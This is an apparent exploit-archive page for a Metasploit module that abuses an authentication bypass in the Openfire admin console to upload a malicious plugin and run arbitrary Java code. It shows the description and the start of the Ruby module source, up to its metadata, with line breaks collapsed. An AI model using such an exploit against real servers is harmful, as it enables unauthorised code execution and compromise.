Openfire Admin Console Authentication Bypass

This Metasploit module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java code. This Metasploit module has been tested against Openfire 3.6.0a. It is possible to remove the uploaded plugin after execution, however this might turn the server in some kind of unstable state, making re-exploitation difficult. You might want to do this manually.

Share This

Openfire Admin Console Authentication Bypass

### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##

require 'msf/core'require 'rex/zip'

class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking

HttpFingerprint = { :pattern => [ /(Jetty)/ ] }

include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE

def initialize(info = {}) super(update_info(info, 'Name' => 'Openfire Admin Console Authentication Bypass', 'Description' => %q{ This module exploits an authentication bypass vulnerability in the administration console of Openfire servers. By using this vulnerability it is possible to upload/execute a malicious Openfire plugin on the server and execute arbitrary Java code. This module has been tested against Openfire 3.6.0a.